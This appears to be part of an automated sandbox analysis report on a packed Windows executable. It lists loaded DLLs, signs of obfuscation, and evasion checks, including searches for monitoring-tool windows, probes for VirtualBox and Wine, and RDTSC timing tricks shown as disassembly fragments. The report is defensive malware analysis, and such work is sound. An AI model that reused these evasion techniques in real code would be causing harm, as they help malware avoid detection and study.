              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: oe9KS7ZHUc.exeStatic file information: File size 2984448 > 1048576
              Source: oe9KS7ZHUc.exeStatic PE information: Raw size of tgmjpzal is bigger than: 0x100000 < 0x2aee00

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeUnpacked PE file: 0.2.oe9KS7ZHUc.exe.8d0000.0.unpack :EW;.rsrc :W;.idata :W;tgmjpzal:EW;tgxwrrdf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;tgmjpzal:EW;tgxwrrdf:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: oe9KS7ZHUc.exeStatic PE information: real checksum: 0x2e01e7 should be: 0x2e57dd
              Source: oe9KS7ZHUc.exeStatic PE information: section name:
              Source: oe9KS7ZHUc.exeStatic PE information: section name: .rsrc
              Source: oe9KS7ZHUc.exeStatic PE information: section name: .idata
              Source: oe9KS7ZHUc.exeStatic PE information: section name: tgmjpzal
              Source: oe9KS7ZHUc.exeStatic PE information: section name: tgxwrrdf
              Source: oe9KS7ZHUc.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB9DD6 push edx; iretd 0_3_05CB9DDB
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB55F9 push ebx; retf 0_3_05CB55FA
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB55F9 push ebx; retf 0_3_05CB55FA
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB55F9 push ebx; retf 0_3_05CB55FA
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB55F9 push ebx; retf 0_3_05CB55FA
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB55F9 push ebx; retf 0_3_05CB55FA
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5599 push ebx; retf 0_3_05CB559A
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5599 push ebx; retf 0_3_05CB559A
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5599 push ebx; retf 0_3_05CB559A
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5599 push ebx; retf 0_3_05CB559A
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5599 push ebx; retf 0_3_05CB559A
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB55B1 push ebx; retf 0_3_05CB55B2
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB55B1 push ebx; retf 0_3_05CB55B2
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB55B1 push ebx; retf 0_3_05CB55B2
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5569 push ebx; retf 0_3_05CB556A
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5569 push ebx; retf 0_3_05CB556A
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5569 push ebx; retf 0_3_05CB556A
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5569 push ebx; retf 0_3_05CB556A
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5569 push ebx; retf 0_3_05CB556A
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5521 push ebx; retf 0_3_05CB5522
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5521 push ebx; retf 0_3_05CB5522
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5521 push ebx; retf 0_3_05CB5522
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5521 push ebx; retf 0_3_05CB5522
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB5521 push ebx; retf 0_3_05CB5522
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB0527 push es; retf 0_3_05CB0666
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB0527 push es; retf 0_3_05CB0666
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CAF4C3 push ebp; retf 0_3_05CAF4CE
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CAF4C3 push ebp; retf 0_3_05CAF4CE
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB54C1 push ebx; retf 0_3_05CB54C2
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB54C1 push ebx; retf 0_3_05CB54C2
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeCode function: 0_3_05CB54C1 push ebx; retf 0_3_05CB54C2
              Source: oe9KS7ZHUc.exeStatic PE information: section name: entropy: 7.979400373790869

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: A9C8CD second address: A9C8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jns 00007FD84520DEE6h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: A9C8E0 second address: A9C8E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: A9C8E8 second address: A9C8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA1FB4 second address: AA1FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 ja 00007FD84502495Ah 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA1FC3 second address: AA1FCD instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD84520DEECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA2119 second address: AA211D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA2256 second address: AA2261 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA3E3A second address: AA3E8C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007FD845024956h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FD845024958h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 movsx edx, ax 0x0000002c push 00000000h 0x0000002e mov ecx, dword ptr [ebp+122D2085h] 0x00000034 call 00007FD845024959h 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jnp 00007FD845024956h 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA3E8C second address: AA3E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA3E91 second address: AA3EC6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007FD845024956h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FD84502495Ah 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jne 00007FD84502495Eh 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007FD845024956h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA3EC6 second address: AA3EE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA3EE0 second address: AA3F59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD845024969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007FD84502495Fh 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FD845024958h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d js 00007FD845024957h 0x00000033 cmc 0x00000034 xor edi, dword ptr [ebp+122D2FA8h] 0x0000003a push 00000003h 0x0000003c sbb cx, 8572h 0x00000041 push 00000000h 0x00000043 movzx edx, di 0x00000046 push 00000003h 0x00000048 sub ecx, dword ptr [ebp+122D1E02h] 0x0000004e push D9BB6726h 0x00000053 push eax 0x00000054 push edx 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 pop edx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA403E second address: AA405D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD84520DEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD84520DEF0h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA405D second address: AA406B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD845024956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA4161 second address: AA4167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA4167 second address: AA41BB instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD845024956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 62F8CADAh 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FD845024958h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d jmp 00007FD84502495Bh 0x00000032 lea ebx, dword ptr [ebp+1244ED04h] 0x00000038 add cx, FDEBh 0x0000003d mov cx, 74FCh 0x00000041 xchg eax, ebx 0x00000042 push ecx 0x00000043 pushad 0x00000044 jnl 00007FD845024956h 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA41BB second address: AA41D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007FD84520DEF2h 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA41D8 second address: AA41DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AA42EC second address: AA434E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 383CE399h 0x0000000d mov dword ptr [ebp+122D1CD7h], edx 0x00000013 lea ebx, dword ptr [ebp+1244ED0Fh] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FD84520DEE8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 push eax 0x00000034 pushad 0x00000035 jmp 00007FD84520DEF0h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FD84520DEF9h 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC5701 second address: AC5707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: A9931B second address: A99320 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC3964 second address: AC3968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC3C2B second address: AC3C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FD84520DEFEh 0x0000000c jmp 00007FD84520DEF6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC3C4F second address: AC3C59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FD845024956h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC3C59 second address: AC3C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007FD84520DEE6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC3C72 second address: AC3C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC3F5D second address: AC3F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC3F61 second address: AC3F79 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD845024956h 0x00000008 jo 00007FD845024956h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007FD845024958h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC40CC second address: AC40EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD84520DEE6h 0x0000000a jmp 00007FD84520DEF9h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC40EF second address: AC40FA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC40FA second address: AC4107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC4107 second address: AC4111 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD845024956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC4111 second address: AC4124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD84520DEEDh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC4124 second address: AC4129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC42B2 second address: AC42D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC4427 second address: AC443F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD845024962h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC443F second address: AC4443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC4727 second address: AC472E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ABC0BF second address: ABC0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ABC0C4 second address: ABC0CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ABC0CA second address: ABC0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD84520DEF4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: ABC0E2 second address: ABC0E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC48A8 second address: AC48AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC4EF8 second address: AC4F0C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD84502495Ah 0x00000008 jc 00007FD84502495Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC5579 second address: AC557D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC9B11 second address: AC9B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AC9165 second address: AC916B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD07AB second address: AD07F3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD845024969h 0x00000008 jmp 00007FD845024961h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FD84502495Ch 0x00000019 pushad 0x0000001a jmp 00007FD845024968h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD07F3 second address: AD07F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD07F8 second address: AD07FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD094A second address: AD094F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD0AB8 second address: AD0ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD0ABE second address: AD0AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: AD0AC2 second address: AD0ACC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
